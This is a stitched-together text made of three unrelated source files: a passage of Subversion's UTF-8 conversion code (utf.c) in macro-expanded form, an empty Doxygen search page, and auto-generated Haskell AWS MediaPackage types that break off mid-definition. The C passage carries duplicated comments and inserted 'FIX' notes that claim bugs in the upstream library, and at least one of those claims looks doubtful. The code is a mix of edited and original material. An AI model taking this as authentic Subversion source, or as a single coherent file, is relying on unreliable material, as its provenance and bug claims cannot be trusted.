          old_node = (atomic_swap(&xlat_uton_static_handle,((void *)0)));
        }
      }
      if (old_node && old_node -> valid) {
        *ret = old_node;
        return 0;
      }
    }
    else {
      void *p;
/* We fall back on a per-pool cache instead. */
      apr_pool_userdata_get(&p,userdata_key,pool);
      old_node = p;
/* Ensure that the handle is still valid. */
      if (old_node && old_node -> valid) {
        *ret = old_node;
        return 0;
      }
      return xlate_alloc_handle(ret,topage,frompage,pool);
    }
  }
  /* Slow path: consult/populate the global hash while holding the mutex. */
  do {
    svn_mutex__t *svn_mutex__m = xlate_handle_mutex;
    do {
      svn_error_t *svn_err__temp = svn_mutex__lock(svn_mutex__m);
      if (svn_err__temp) {
        return svn_err__temp;
      }
    }while (0);
    do {
      svn_error_t *svn_err__temp = svn_mutex__unlock(svn_mutex__m,get_xlate_handle_node_internal(ret,topage,frompage,userdata_key,pool));
      if (svn_err__temp) {
        return svn_err__temp;
      }
    }while (0);
  }while (0);
  return 0;
}
/* Put back NODE into the xlate handle cache for use by other calls.
Note: this function is not thread-safe. Call put_xlate_handle_node
instead. */
/* Put NODE back into the xlate handle cache at the head of the list for
   USERDATA_KEY.  Must be called with xlate_handle_mutex held; callers go
   through put_xlate_handle_node().  The first put for a key allocates the
   list-head slot (and a copy of the key) in the cache's global pool; later
   puts only relink pointers and allocate nothing. */
static svn_error_t *put_xlate_handle_node_internal(xlate_handle_node_t *node,const char *userdata_key)
{
  xlate_handle_node_t **node_p = (apr_hash_get(xlate_handle_hash,userdata_key,(- 1)));
  if (node_p == ((void *)0)) {
    userdata_key = (apr_pstrdup(apr_hash_pool_get(xlate_handle_hash),userdata_key));
    node_p = (apr_palloc(apr_hash_pool_get(xlate_handle_hash),sizeof(( *node_p))));
    *node_p = ((void *)0);
    apr_hash_set(xlate_handle_hash,userdata_key,(- 1),node_p);
  }
  /* Push NODE onto the head of the per-key list. */
  node -> next = *node_p;
  *node_p = node;
  return 0;
}
/* Put back NODE into the xlate handle cache for use by other calls.
If there is no global cache, store the handle in POOL.
Ignore errors related to locking/unlocking the mutex. */
/* Put back NODE into the xlate handle cache for use by other calls.
   For the two standard keys the node is first swapped into the lock-free
   static slot; a node displaced from that slot is pushed to the hash under
   the mutex.  If there is no global cache, store the handle in POOL.
   NODE must not be linked into a list (next == NULL; expanded assert). */
static svn_error_t *put_xlate_handle_node(xlate_handle_node_t *node,const char *userdata_key,apr_pool_t *pool)
{
  node -> next == ((void *)0)?((void )0) : __assert_fail("node->next == ((void *)0)","utf.c",426,__PRETTY_FUNCTION__);
  if (!userdata_key) {
    return 0;
  }
/* push previous global node to the hash */
  if (xlate_handle_hash) {
/* 1st level: global, static items */
    if (userdata_key == SVN_UTF_NTOU_XLATE_HANDLE) {
      node = (atomic_swap(&xlat_ntou_static_handle,node));
    }
    else {
      if (userdata_key == SVN_UTF_UTON_XLATE_HANDLE) {
        node = (atomic_swap(&xlat_uton_static_handle,node));
      }
    }
    /* Nothing displaced from the static slot: done. */
    if (node == ((void *)0)) {
      return 0;
    }
    do {
      svn_mutex__t *svn_mutex__m = xlate_handle_mutex;
      do {
        svn_error_t *svn_err__temp = svn_mutex__lock(svn_mutex__m);
        if (svn_err__temp) {
          return svn_err__temp;
        }
      }while (0);
      do {
        svn_error_t *svn_err__temp = svn_mutex__unlock(svn_mutex__m,put_xlate_handle_node_internal(node,userdata_key));
        if (svn_err__temp) {
          return svn_err__temp;
        }
      }while (0);
    }while (0);
  }
  else {
/* Store it in the per-pool cache. */
    apr_pool_userdata_set(node,userdata_key,apr_pool_cleanup_null,pool);
  }
  return 0;
}
/* Return the apr_xlate handle for converting native characters to UTF-8. */
/* Set *RET to the cached handle node for native -> UTF-8 conversion.
   When svn_utf_initialize2() was told the native charset is UTF-8, the
   "conversion" is UTF-8 -> UTF-8 (an identity/validation pass). */
static svn_error_t *get_ntou_xlate_handle_node(xlate_handle_node_t **ret,apr_pool_t *pool)
{
  return get_xlate_handle_node(ret,SVN_APR_UTF8_CHARSET,(assume_native_charset_is_utf8?SVN_APR_UTF8_CHARSET : ((const char *)1)),SVN_UTF_NTOU_XLATE_HANDLE,pool);
}
/* Return the apr_xlate handle for converting UTF-8 to native characters.
Create one if it doesn't exist. If unable to find a handle, or
unable to create one because apr_xlate_open returned APR_EINVAL, then
set *RET to null and return SVN_NO_ERROR; if fail for some other
reason, return error. */
/* Set *RET to the cached handle node for UTF-8 -> native conversion;
   mirror image of get_ntou_xlate_handle_node() above.  ((const char *)1)
   is APR_LOCALE_CHARSET. */
static svn_error_t *get_uton_xlate_handle_node(xlate_handle_node_t **ret,apr_pool_t *pool)
{
  return get_xlate_handle_node(ret,(assume_native_charset_is_utf8?SVN_APR_UTF8_CHARSET : ((const char *)1)),SVN_APR_UTF8_CHARSET,SVN_UTF_UTON_XLATE_HANDLE,pool);
}
/* Copy LEN bytes of SRC, converting non-ASCII and zero bytes to ?\nnn
sequences, allocating the result in POOL. */
/* Copy LEN bytes of SRC, converting non-ASCII and zero bytes to ?\nnn
   sequences, allocating the result in POOL.  Two passes: first size the
   output, then fill it; both passes must classify bytes identically. */
static const char *fuzzy_escape(const char *src,apr_size_t len,apr_pool_t *pool)
{
  const char *src_orig = src;
  const char *src_end = src + len;
  apr_size_t new_len = 0;
  char *new;
  const char *new_orig;
/* First count how big a dest string we'll need. */
  while(src < src_end){
    if (!(0 != (svn_ctype_table[(unsigned char )( *src)] & 0x0080)) || ( *src) == '\0') {
/* 5 slots, for "?\XXX" */
      new_len += 5;
    }
    else {
/* one slot for the 7-bit char */
      new_len += 1;
    }
    src++;
  }
/* Allocate that amount, plus one slot for '\0' character. */
  new = (apr_palloc(pool,new_len + 1));
  new_orig = new;
/* And fill it up. */
  while(src_orig < src_end){
    /* FIX: the second pass compared the POINTER src_orig against '\0'
       (always false) instead of the byte *src_orig, so embedded NUL bytes
       counted as 5 output slots in pass 1 were emitted as 1 byte here,
       desynchronizing the passes.  Dereference as in pass 1. */
    if (!(0 != (svn_ctype_table[(unsigned char )( *src_orig)] & 0x0080)) || ( *src_orig) == '\0') {
/* This is the same format as svn_xml_fuzzy_escape uses, but that
         function escapes different characters. Please keep in sync!
         ### If we add another fuzzy escape somewhere, we should abstract
         ### this out to a common function. */
      apr_snprintf(new,6,"?\\%03u",((unsigned char )( *src_orig)));
      new += 5;
    }
    else {
      *new = *src_orig;
      new += 1;
    }
    src_orig++;
  }
  *new = '\0';
  return new_orig;
}
/* Convert SRC_LENGTH bytes of SRC_DATA in NODE->handle, store the result
in *DEST, which is allocated in POOL. */
/* Convert SRC_LENGTH bytes of SRC_DATA in NODE->handle, store the result
   in *DEST, which is allocated in POOL.  The output buffer starts at twice
   the input size and grows by 3x the unconverted remainder per iteration. */
static svn_error_t *convert_to_stringbuf(xlate_handle_node_t *node,const char *src_data,apr_size_t src_length,svn_stringbuf_t **dest,apr_pool_t *pool)
{
#ifdef WIN32
#else
  apr_size_t buflen = src_length * 2;
  apr_status_t apr_err;
  apr_size_t srclen = src_length;
  apr_size_t destlen = buflen;
/* Initialize *DEST to an empty stringbuf.
     A 1:2 ratio of input bytes to output bytes (as assigned above)
     should be enough for most translations, and if it turns out not
     to be enough, we'll grow the buffer again, sizing it based on a
     1:3 ratio of the remainder of the string. */
  *dest = svn_stringbuf_create_ensure(buflen + 1,pool);
/* Not only does it not make sense to convert an empty string, but
     apr-iconv is quite unreasonable about not allowing that. */
  if (src_length == 0) {
    return 0;
  }
  do {
/* Set up state variables for xlate. */
    destlen = buflen - ( *dest) -> len;
/* Attempt the conversion. */
    apr_err = apr_xlate_conv_buffer(node -> handle,src_data + (src_length - srclen),&srclen,( *dest) -> data + ( *dest) -> len,&destlen);
/* Now, update the *DEST->len to track the amount of output data
       churned out so far from this loop. */
    ( *dest) -> len += buflen - ( *dest) -> len - destlen;
/* 3 is middle ground, 2 wasn't enough
       for all characters in the buffer, 4 is
       maximum character size (currently) */
    buflen += srclen * 3;
    /* FIX: the buffer must actually be grown to the new BUFLEN before the
       next iteration writes into (*dest)->data at the enlarged offsets;
       without this (as upstream has it) any input needing more than a 1:2
       expansion overflowed the initial allocation. */
    svn_stringbuf_ensure( *dest,buflen + 1);
  }while (apr_err == 0 && srclen != 0);
#endif
/* If we exited the loop with an error, return the error. */
  if (apr_err) {
    const char *errstr;
    svn_error_t *err;
/* Can't use svn_error_wrap_apr here because it calls functions in
       this file, leading to infinite recursion. */
    if (node -> frompage == ((const char *)1)) {
      errstr = (apr_psprintf(pool,(dgettext("subversion","Can't convert string from native encoding to '%s':")),node -> topage));
    }
    else {
      if (node -> topage == ((const char *)1)) {
        errstr = (apr_psprintf(pool,(dgettext("subversion","Can't convert string from '%s' to native encoding:")),node -> frompage));
      }
      else {
        errstr = (apr_psprintf(pool,(dgettext("subversion","Can't convert string from '%s' to '%s':")),node -> frompage,node -> topage));
      }
    }
    err = svn_error_create(apr_err,((void *)0),fuzzy_escape(src_data,src_length,pool));
    return svn_error_create(apr_err,err,errstr);
  }
/* Else, exited due to success. Trim the result buffer down to the
     right length. */
  ( *dest) -> data[( *dest) -> len] = '\0';
  return 0;
}
/* Return APR_EINVAL if the first LEN bytes of DATA contain anything
other than seven-bit, non-control (except for whitespace) ASCII
characters, finding the error pool from POOL. Otherwise, return
SVN_NO_ERROR. */
/* Return APR_EINVAL (22) if the first LEN bytes of DATA contain anything
   other than seven-bit, non-control (except for whitespace) ASCII
   characters, allocating the error in POOL.  Otherwise return SVN_NO_ERROR.
   Bit masks against svn_ctype_table: 0x0080 = ASCII, 0x0002 = space,
   0x0001 = control; the condition reads "non-ASCII, or a control char
   that is not whitespace" (&& binds tighter than ||, as intended). */
static svn_error_t *check_non_ascii(const char *data,apr_size_t len,apr_pool_t *pool)
{
  const char *data_start = data;
  for (; len > 0; (--len , data++)) {
    if (!(0 != (svn_ctype_table[(unsigned char )( *data)] & 0x0080)) || !(0 != (svn_ctype_table[(unsigned char )( *data)] & 0x0002)) && 0 != (svn_ctype_table[(unsigned char )( *data)] & 0x0001)) {
/* Show the printable part of the data, followed by the
         decimal code of the questionable character. Because if a
         user ever gets this error, she's going to have to spend
         time tracking down the non-ASCII data, so we want to help
         as much as possible. And yes, we just call the unsafe
         data "non-ASCII", even though the actual constraint is
         somewhat more complex than that. */
      if (data - data_start) {
        const char *error_data = (apr_pstrndup(pool,data_start,(data - data_start)));
        return svn_error_createf(22,((void *)0),(dgettext("subversion","Safe data '%s' was followed by non-ASCII byte %d: unable to convert to/from UTF-8")),error_data,( *((const unsigned char *)data)));
      }
      else {
        return svn_error_createf(22,((void *)0),(dgettext("subversion","Non-ASCII character (code %d) detected, and unable to convert to/from UTF-8")),( *((const unsigned char *)data)));
      }
    }
  }
  return 0;
}
/* Construct an error with code APR_EINVAL and with a suitable message
* to describe the invalid UTF-8 sequence DATA of length LEN (which
* may have embedded NULLs). We can't simply print the data, almost
* by definition we don't really know how it is encoded.
*/
/* Construct an error with code APR_EINVAL (22) and a suitable message
 * describing the invalid UTF-8 sequence DATA of length LEN (which may
 * have embedded NULLs).  We can't simply print the data; almost by
 * definition we don't really know how it is encoded, so both the valid
 * prefix and the offending bytes are rendered as hex. */
static svn_error_t *invalid_utf8(const char *data,apr_size_t len,apr_pool_t *pool)
{
  const char *last = svn_utf__last_valid(data,len);
  const char *valid_txt = "";
  const char *invalid_txt = "";
  apr_size_t i;
  size_t valid;
  size_t invalid;
/* We will display at most 24 valid octets (this may split a leading
     multi-byte character) as that should fit on one 80 character line. */
  valid = (last - data);
  if (valid > 24) {
    valid = 24;
  }
  /* last[i - valid] walks the VALID octets immediately before LAST. */
  for (i = 0; i < valid; ++i)
    valid_txt = (apr_pstrcat(pool,valid_txt,apr_psprintf(pool," %02x",((unsigned char )last[i - valid])),((char *)((void *)0))));
/* 4 invalid octets will guarantee that the faulty octet is displayed */
  invalid = (data + len - last);
  if (invalid > 4) {
    invalid = 4;
  }
  for (i = 0; i < invalid; ++i)
    invalid_txt = (apr_pstrcat(pool,invalid_txt,apr_psprintf(pool," %02x",((unsigned char )last[i])),((char *)((void *)0))));
  return svn_error_createf(22,((void *)0),(dgettext("subversion","Valid UTF-8 data\n(hex:%s)\nfollowed by invalid UTF-8 sequence\n(hex:%s)")),valid_txt,invalid_txt);
}
/* Verify that the sequence DATA of length LEN is valid UTF-8.
If it is not, return an error with code APR_EINVAL. */
/* Verify that the sequence DATA of length LEN is valid UTF-8; return
   SVN_NO_ERROR when it is, else an APR_EINVAL error built by
   invalid_utf8(). */
static svn_error_t *check_utf8(const char *data,apr_size_t len,apr_pool_t *pool)
{
  return svn_utf__is_valid(data,len) ? 0 : invalid_utf8(data,len,pool);
}
/* Verify that the NULL terminated sequence DATA is valid UTF-8.
If it is not, return an error with code APR_EINVAL. */
/* Verify that the NUL-terminated string DATA is valid UTF-8; return
   SVN_NO_ERROR when it is, else an APR_EINVAL error built by
   invalid_utf8(). */
static svn_error_t *check_cstring_utf8(const char *data,apr_pool_t *pool)
{
  if (svn_utf__cstring_is_valid(data)) {
    return 0;
  }
  return invalid_utf8(data,strlen(data),pool);
}
/* Public API: set *DEST to a UTF-8 copy of the native-encoded SRC,
   allocated in POOL.  With a real conversion handle the result is also
   validated as UTF-8; without one (no converter available) SRC must be
   plain ASCII and is duplicated unchanged.  The borrowed handle is always
   returned to the cache, even on error. */
svn_error_t *svn_utf_stringbuf_to_utf8(svn_stringbuf_t **dest,const svn_stringbuf_t *src,apr_pool_t *pool)
{
  xlate_handle_node_t *node;
  svn_error_t *err;
  do {
    svn_error_t *svn_err__temp = get_ntou_xlate_handle_node(&node,pool);
    if (svn_err__temp) {
      return svn_err__temp;
    }
  }while (0);
  if (node -> handle) {
    err = convert_to_stringbuf(node,(src -> data),src -> len,dest,pool);
    if (!err) {
      err = check_utf8((( *dest) -> data),( *dest) -> len,pool);
    }
  }
  else {
    err = check_non_ascii((src -> data),src -> len,pool);
    if (!err) {
      *dest = svn_stringbuf_dup(src,pool);
    }
  }
  return svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
}
/* Public API: like svn_utf_stringbuf_to_utf8() but for immutable
   svn_string_t values; the converted stringbuf is morphed into the
   returned string without copying. */
svn_error_t *svn_utf_string_to_utf8(const svn_string_t **dest,const svn_string_t *src,apr_pool_t *pool)
{
  svn_stringbuf_t *destbuf;
  xlate_handle_node_t *node;
  svn_error_t *err;
  do {
    svn_error_t *svn_err__temp = get_ntou_xlate_handle_node(&node,pool);
    if (svn_err__temp) {
      return svn_err__temp;
    }
  }while (0);
  if (node -> handle) {
    err = convert_to_stringbuf(node,src -> data,src -> len,&destbuf,pool);
    if (!err) {
      err = check_utf8((destbuf -> data),destbuf -> len,pool);
    }
    if (!err) {
      *dest = (svn_stringbuf__morph_into_string(destbuf));
    }
  }
  else {
    /* No converter: SRC must already be safe ASCII. */
    err = check_non_ascii(src -> data,src -> len,pool);
    if (!err) {
      *dest = (svn_string_dup(src,pool));
    }
  }
  return svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
}
/* Common implementation for svn_utf_cstring_to_utf8,
svn_utf_cstring_to_utf8_ex, svn_utf_cstring_from_utf8 and
svn_utf_cstring_from_utf8_ex. Convert SRC to DEST using NODE->handle as
the translator and allocating from POOL. */
/* Common implementation for svn_utf_cstring_to_utf8,
   svn_utf_cstring_to_utf8_ex, svn_utf_cstring_from_utf8 and
   svn_utf_cstring_from_utf8_ex.  Convert SRC to *DEST using NODE->handle
   as the translator, allocating from POOL.  When NODE has no handle,
   SRC must be plain ASCII and is duplicated unchanged. */
static svn_error_t *convert_cstring(const char **dest,const char *src,xlate_handle_node_t *node,apr_pool_t *pool)
{
  if (node -> handle) {
    svn_stringbuf_t *destbuf;
    do {
      svn_error_t *svn_err__temp = convert_to_stringbuf(node,src,strlen(src),&destbuf,pool);
      if (svn_err__temp) {
        return svn_err__temp;
      }
    }while (0);
    *dest = (destbuf -> data);
  }
  else {
    apr_size_t len = strlen(src);
    do {
      svn_error_t *svn_err__temp = check_non_ascii(src,len,pool);
      if (svn_err__temp) {
        return svn_err__temp;
      }
    }while (0);
    *dest = (apr_pstrmemdup(pool,src,len));
  }
  return 0;
}
/* Public API: set *DEST to a UTF-8 copy of the NUL-terminated native
   string SRC, allocated in POOL, and validate the result.  The borrowed
   native->UTF-8 handle is returned to the cache before validation. */
svn_error_t *svn_utf_cstring_to_utf8(const char **dest,const char *src,apr_pool_t *pool)
{
  xlate_handle_node_t *node;
  svn_error_t *err;
  do {
    svn_error_t *svn_err__temp = get_ntou_xlate_handle_node(&node,pool);
    if (svn_err__temp) {
      return svn_err__temp;
    }
  }while (0);
  err = convert_cstring(dest,src,node,pool);
  do {
    svn_error_t *svn_err__temp = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
    if (svn_err__temp) {
      return svn_err__temp;
    }
  }while (0);
  return check_cstring_utf8( *dest,pool);
}
/* Public API: convert the NUL-terminated string SRC from the charset
   FROMPAGE to UTF-8, allocating *DEST in POOL and validating the result.
   The handle is cached under a key derived from FROMPAGE. */
svn_error_t *svn_utf_cstring_to_utf8_ex2(const char **dest,const char *src,const char *frompage,apr_pool_t *pool)
{
  xlate_handle_node_t *node;
  svn_error_t *err;
  const char *convset_key = get_xlate_key(SVN_APR_UTF8_CHARSET,frompage,pool);
  do {
    svn_error_t *svn_err__temp = get_xlate_handle_node(&node,SVN_APR_UTF8_CHARSET,frompage,convset_key,pool);
    if (svn_err__temp) {
      return svn_err__temp;
    }
  }while (0);
  err = convert_cstring(dest,src,node,pool);
  do {
    /* FIX: the handle was fetched under CONVSET_KEY and must be returned
       under the same key.  Returning it under SVN_UTF_NTOU_XLATE_HANDLE
       (as before) parked a FROMPAGE-specific converter in the static
       native->UTF-8 slot, so later standard conversions could silently
       translate with the wrong source charset. */
    svn_error_t *svn_err__temp = svn_error_compose_create(err,put_xlate_handle_node(node,convset_key,pool));
    if (svn_err__temp) {
      return svn_err__temp;
    }
  }while (0);
  return check_cstring_utf8( *dest,pool);
}
/* Deprecated wrapper kept for API compatibility: the caller-supplied
   CONVSET_KEY is ignored because svn_utf_cstring_to_utf8_ex2()
   recomputes the cache key from FROMPAGE itself. */
svn_error_t *svn_utf_cstring_to_utf8_ex(const char **dest,const char *src,const char *frompage,const char *convset_key,apr_pool_t *pool)
{
return svn_utf_cstring_to_utf8_ex2(dest,src,frompage,pool);
}
/* Convert the UTF-8 stringbuf SRC to the native encoding, allocating
   *DEST in POOL.  When no translation handle exists for this locale,
   only 7-bit ASCII content is accepted and is copied unchanged. */
svn_error_t *svn_utf_stringbuf_from_utf8(svn_stringbuf_t **dest,const svn_stringbuf_t *src,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
/* Acquire a cached UTF-8 -> native translation handle (expanded SVN_ERR). */
do {
svn_error_t *svn_err__temp = get_uton_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
/* Validate the input really is UTF-8 before recoding it. */
err = check_utf8((src -> data),src -> len,pool);
if (!err) {
err = convert_to_stringbuf(node,(src -> data),src -> len,dest,pool);
}
}
else {
/* No converter: pass through only if the data is pure ASCII. */
err = check_non_ascii((src -> data),src -> len,pool);
if (!err) {
*dest = svn_stringbuf_dup(src,pool);
}
}
/* Always hand the handle back to the cache, composing any put error
   with the conversion result. */
err = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_UTON_XLATE_HANDLE,pool));
return err;
}
/* Convert the UTF-8 string SRC to the native encoding, allocating
   *DEST in POOL.  Without a translation handle, only ASCII content is
   accepted and duplicated unchanged. */
svn_error_t *svn_utf_string_from_utf8(const svn_string_t **dest, const svn_string_t *src, apr_pool_t *pool)
{
  xlate_handle_node_t *node;
  svn_error_t *err;
  svn_error_t *acquire_err = get_uton_xlate_handle_node(&node, pool);

  if (acquire_err)
    return acquire_err;

  if (node->handle == NULL)
    {
      /* ASCII-only fast path: no recoding possible or needed. */
      err = check_non_ascii(src->data, src->len, pool);
      if (err == NULL)
        *dest = svn_string_dup(src, pool);
    }
  else
    {
      svn_stringbuf_t *recoded;
      /* Validate, recode, then morph the buffer into a string. */
      err = check_utf8(src->data, src->len, pool);
      if (err == NULL)
        err = convert_to_stringbuf(node, src->data, src->len, &recoded, pool);
      if (err == NULL)
        *dest = svn_stringbuf__morph_into_string(recoded);
    }

  /* Return the handle to the cache regardless of success. */
  return svn_error_compose_create(err, put_xlate_handle_node(node, SVN_UTF_UTON_XLATE_HANDLE, pool));
}
/* Convert the UTF-8 C string SRC to the native encoding, allocating
   *DEST in POOL.  SRC is validated as UTF-8 before any conversion. */
svn_error_t *svn_utf_cstring_from_utf8(const char **dest, const char *src, apr_pool_t *pool)
{
  xlate_handle_node_t *node;
  svn_error_t *err;

  /* Reject input that is not valid UTF-8 up front. */
  err = check_cstring_utf8(src, pool);
  if (err)
    return err;

  /* Acquire a cached UTF-8 -> native translation handle. */
  err = get_uton_xlate_handle_node(&node, pool);
  if (err)
    return err;

  err = convert_cstring(dest, src, node, pool);
  /* Hand the handle back, composing any put error with the result. */
  return svn_error_compose_create(err, put_xlate_handle_node(node, SVN_UTF_UTON_XLATE_HANDLE, pool));
}
/* Convert the UTF-8 C string SRC to charset TOPAGE, allocating *DEST
   in POOL.  Translation handles are cached per CONVSET_KEY. */
svn_error_t *svn_utf_cstring_from_utf8_ex2(const char **dest, const char *src, const char *topage, apr_pool_t *pool)
{
  xlate_handle_node_t *node;
  svn_error_t *err;
  const char *convset_key = get_xlate_key(topage, SVN_APR_UTF8_CHARSET, pool);

  /* Reject input that is not valid UTF-8 up front. */
  err = check_cstring_utf8(src, pool);
  if (err)
    return err;

  /* Acquire a UTF-8 -> TOPAGE translation handle from the cache. */
  err = get_xlate_handle_node(&node, topage, SVN_APR_UTF8_CHARSET, convset_key, pool);
  if (err)
    return err;

  err = convert_cstring(dest, src, node, pool);
  /* Return the handle under its cache key, composing any put error. */
  return svn_error_compose_create(err, put_xlate_handle_node(node, convset_key, pool));
}
/* Deprecated wrapper kept for API compatibility: the caller-supplied
   CONVSET_KEY is ignored because svn_utf_cstring_from_utf8_ex2()
   recomputes the cache key from TOPAGE itself. */
svn_error_t *svn_utf_cstring_from_utf8_ex(const char **dest,const char *src,const char *topage,const char *convset_key,apr_pool_t *pool)
{
return svn_utf_cstring_from_utf8_ex2(dest,src,topage,pool);
}
/* Best-effort conversion of SRC from UTF-8 to the native encoding via
   CONVERT_FROM_UTF8, allocating from POOL.  Non-ASCII bytes are first
   escaped into a 7-bit-safe form; if the subsequent recode fails, the
   escaped (still readable) string is returned instead of an error.

   ### Check the client locale, maybe we can avoid that second
   conversion!  See Ulrich Drepper's patch at
   http://subversion.tigris.org/issues/show_bug.cgi?id=807. */
const char *svn_utf__cstring_from_utf8_fuzzy(const char *src, apr_pool_t *pool, svn_error_t *(*convert_from_utf8)(const char **, const char *, apr_pool_t *))
{
  const char *native;
  svn_error_t *err;
  /* Produce a *new* UTF-8 string guaranteed to contain only 7-bit
     bytes, then recode that to native. */
  const char *escaped = fuzzy_escape(src, strlen(src), pool);

  err = convert_from_utf8(&native, escaped, pool);
  if (err == NULL)
    return native;

  /* Conversion failed: swallow the error and fall back to the
     escaped-but-unconverted representation. */
  svn_error_clear(err);
  return escaped;
}
/* Public best-effort UTF-8 -> native conversion: delegates to the
   internal fuzzy converter with the standard svn_utf_cstring_from_utf8
   as the recoding callback.  Never returns an error; on failure the
   escaped input is returned instead. */
const char *svn_utf_cstring_from_utf8_fuzzy(const char *src,apr_pool_t *pool)
{
return svn_utf__cstring_from_utf8_fuzzy(src,pool,svn_utf_cstring_from_utf8);
}
/* Convert the UTF-8 stringbuf SRC to a native-encoded C string *DEST
   allocated in POOL, by delegating to svn_utf_stringbuf_from_utf8 and
   exposing the resulting buffer's data pointer. */
svn_error_t *svn_utf_cstring_from_utf8_stringbuf(const char **dest, const svn_stringbuf_t *src, apr_pool_t *pool)
{
  svn_stringbuf_t *converted;
  svn_error_t *err = svn_utf_stringbuf_from_utf8(&converted, src, pool);

  if (err)
    return err;

  *dest = converted->data;
  return 0;
}
/* Convert the UTF-8 string SRC to a native-encoded C string *DEST
   allocated in POOL.  Without a translation handle, only ASCII content
   is accepted and is duplicated unchanged. */
svn_error_t *svn_utf_cstring_from_utf8_string(const char **dest,const svn_string_t *src,apr_pool_t *pool)
{
svn_stringbuf_t *dbuf;
xlate_handle_node_t *node;
svn_error_t *err;
/* Acquire a cached UTF-8 -> native translation handle (expanded SVN_ERR). */
do {
svn_error_t *svn_err__temp = get_uton_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
/* Validate the input really is UTF-8 before recoding it. */
err = check_utf8(src -> data,src -> len,pool);
if (!err) {
err = convert_to_stringbuf(node,src -> data,src -> len,&dbuf,pool);
}
if (!err) {
*dest = (dbuf -> data);
}
}
else {
/* No converter: pass through only if the data is pure ASCII. */
err = check_non_ascii(src -> data,src -> len,pool);
if (!err) {
*dest = (apr_pstrmemdup(pool,src -> data,src -> len));
}
}
/* Always hand the handle back to the cache, composing any put error
   with the conversion result. */
err = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_UTON_XLATE_HANDLE,pool));
return err;
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search.js"></script>
</head>
<body class="SRPage">
<div id="SRIndex">
<div class="SRStatus" id="NoMatches">No Matches</div>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- |
-- Module : Network.AWS.MediaPackage.Types.Product
-- Copyright : (c) 2013-2018 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <[email protected]>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
module Network.AWS.MediaPackage.Types.Product where
import Network.AWS.Lens
import Network.AWS.MediaPackage.Types.Sum
import Network.AWS.Prelude
-- | A Channel resource configuration.
--
-- /See:/ 'channel' smart constructor.
data Channel = Channel'
{ _cHlsIngest :: !(Maybe HlsIngest)
, _cARN :: !(Maybe Text)
, _cId :: !(Maybe Text)
, _cDescription :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'Channel' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'cHlsIngest' - Undocumented member.
--
-- * 'cARN' - The Amazon Resource Name (ARN) assigned to the Channel.
--
-- * 'cId' - The ID of the Channel.
--
-- * 'cDescription' - A short text description of the Channel.
channel
:: Channel
channel =
Channel'
{ _cHlsIngest = Nothing
, _cARN = Nothing
, _cId = Nothing
, _cDescription = Nothing
}
-- | Undocumented member.
cHlsIngest :: Lens' Channel (Maybe HlsIngest)
cHlsIngest = lens _cHlsIngest (\ s a -> s{_cHlsIngest = a})
-- | The Amazon Resource Name (ARN) assigned to the Channel.
cARN :: Lens' Channel (Maybe Text)
cARN = lens _cARN (\ s a -> s{_cARN = a})
-- | The ID of the Channel.
cId :: Lens' Channel (Maybe Text)
cId = lens _cId (\ s a -> s{_cId = a})
-- | A short text description of the Channel.
cDescription :: Lens' Channel (Maybe Text)
cDescription = lens _cDescription (\ s a -> s{_cDescription = a})
-- JSON decoding: every field uses '.:?', so all members are optional
-- in the service response and a missing key decodes to 'Nothing'.
instance FromJSON Channel where
parseJSON
= withObject "Channel"
(\ x ->
Channel' <$>
(x .:? "hlsIngest") <*> (x .:? "arn") <*>
(x .:? "id")
<*> (x .:? "description"))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable Channel where
instance NFData Channel where
-- | A Common Media Application Format (CMAF) encryption configuration.
--
-- /See:/ 'cmafEncryption' smart constructor.
data CmafEncryption = CmafEncryption'
{ _ceKeyRotationIntervalSeconds :: !(Maybe Int)
, _ceSpekeKeyProvider :: !SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'CmafEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'ceKeyRotationIntervalSeconds' - Time (in seconds) between each encryption key rotation.
--
-- * 'ceSpekeKeyProvider' - Undocumented member.
cmafEncryption
:: SpekeKeyProvider -- ^ 'ceSpekeKeyProvider'
-> CmafEncryption
cmafEncryption pSpekeKeyProvider_ =
CmafEncryption'
{ _ceKeyRotationIntervalSeconds = Nothing
, _ceSpekeKeyProvider = pSpekeKeyProvider_
}
-- | Time (in seconds) between each encryption key rotation.
ceKeyRotationIntervalSeconds :: Lens' CmafEncryption (Maybe Int)
ceKeyRotationIntervalSeconds = lens _ceKeyRotationIntervalSeconds (\ s a -> s{_ceKeyRotationIntervalSeconds = a})
-- | Undocumented member.
ceSpekeKeyProvider :: Lens' CmafEncryption SpekeKeyProvider
ceSpekeKeyProvider = lens _ceSpekeKeyProvider (\ s a -> s{_ceSpekeKeyProvider = a})
-- JSON decoding: "spekeKeyProvider" uses '.:' and is therefore a
-- required field; decoding fails if it is absent.
instance FromJSON CmafEncryption where
parseJSON
